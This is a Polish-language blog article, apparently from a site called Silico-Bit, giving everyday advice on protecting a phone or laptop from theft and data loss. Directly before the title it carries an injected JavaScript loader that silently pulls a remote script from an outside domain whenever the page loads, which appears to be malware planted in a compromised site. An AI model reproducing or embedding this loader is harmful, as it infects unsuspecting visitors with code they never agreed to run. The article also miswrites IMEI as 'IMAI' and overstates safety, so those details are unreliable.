;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Jak zabezpieczyć telefon, laptop, tablet przed włamaniem i kradzieżą danych? | Silico-Bit
Jak zabezpieczyć telefon, laptop, tablet przed włamaniem i kradzieżą danych?

Telefon to najczęściej używane przez nas urządzenie. Z tego powodu bardzo często gubimy go w najmniej odpowiednich momentach lub zostajemy ofiarami kradzieży. Niestety w przypadku smartfonów najnowszej generacji, znajdują się na nich również wszystkie dostępy do naszych poufnych danych, m.in. bankowości mobilnej, poczty elektronicznej, kontaktów i treści wiadomości. Jak uchronić się przed włamaniem do naszego telefonu i kradzieżą danych, jeśli zgubienie telefonu może zdarzyć nam w każdej chwili?


Kradzież telefonu jest niebezpieczna w kontekście posiadanych w nim danych

3 PIERWSZE KROKI

Jeśli zgubimy telefon, bądź okaże się, że go zagubiliśmy, pierwszym krokiem jest oczywiście zmiana haseł do wszystkich aplikacji, kont i informacji, które mieliśmy na urządzeniu. Później należy zablokować kartę SIM u operatora i dopiero później wdrażać systemy bezpieczeństwa. Oczywiście kradzież należy jak najszybciej zgłosić na policję. Nie chcemy przecież, żeby złodziej był bezkarny.

Namierzenie telefonu

Nie wpadajmy w panikę, ponieważ w dzisiejszych czasach jest możliwość namierzenia naszego telefonu za pomocą GPS. Istnieją ogólnodostępne, płatne bądź nie, aplikacje służące właśnie lokalizacji telefonu. Idąc o krok dalej, można w telefonie zainstalować system, który pozwoli na blokadę telefonu w przypadku wymiany karty SIM. Dodatkowymi opcjami jest także głośny alarm, całkowita blokada telefonu lub możliwość zrobienia zdjęcia po wpisaniu błędnego kodu. Możliwości jest wiele, lecz w przypadku kradzieży są niezwykle pomocne nie tylko w kwestii znalezienia telefonu na mapach, ale także zabezpieczenia prywatnych danych. W zależności od rodzaju systemu i źródła, można wybrać idealny dla swojego telefonu system bezpieczeństwa. Niektóre urządzenia mają go już na start.


W każdej chwili możemy stać się ofiarami kradzieży

Kod zabezpieczający i Face ID

Oczywiście warto przy tym posiadać podstawową ochronę telefonu w postaci blokad dostępu, np. poprzez odcisk palca, kod zabezpieczający czy popularne w urządzeniach Apple Face ID, które rozpoznaje twarz właściciela. W tym ostatnim przypadku nie jest łatwo odblokować smartfon, pod warunkiem, że złodziej nie ma naszego zdjęcia, które bez problemu może posłużyć do odblokowania ekranu.

Numer IMAI

Warto mieć zawsze przy sobie zapisany numer IMAI, który posiada każdy telefon. Jest on bardzo pomocny przy identyfikacji telefonu oraz jego właściciela.

Cecha charakterystyczna

Policja radzi, aby na obudowie ekranu zostawić jakiś charakterystyczny znak, który sugerowałby, że to właśnie nasz telefon. Może być to maleńka, niewidoczna ryska, kropka zaznaczona markerem lub cokolwiek innego, co pomogłoby udowodnić, że to naprawdę nasz telefon.

Kopia zapasowa danych

Oczywiście warto mieć też uruchomioną opcję automatycznego zapisu kopii zapasowej danych, aby po kradzieży mieć dostęp do wszystkich informacji, które znajdowały się w telefonie. Po włączeniu odpowiedniej opcji w urządzeniu, wszelkie hasła i zabezpieczenia będą widoczne na koncie Google, Microsoft lub iTunes oraz iCloud, w zależności od typu systemu. Nawet, jeśli w urządzeniu nie było bankowości mobilnej czy poczty elektronicznej, warto włączyć opcję zapisu choćby ze względu na zachowanie zdjęć, filmów czy biblioteki plików.


Bez odpowiedniej reakcji, kradzież danych może nieść za sobą poważne skutki, takie jak kredyty i zobowiązania na nasze nazwisko

 

Jeśli te wszystkie zasady wprowadzisz w życie, Twoje dane będą w pełni bezpieczne. Działaj szybko i bez paniki – przemyślane rozwiązania są w stanie zdziałać wiele.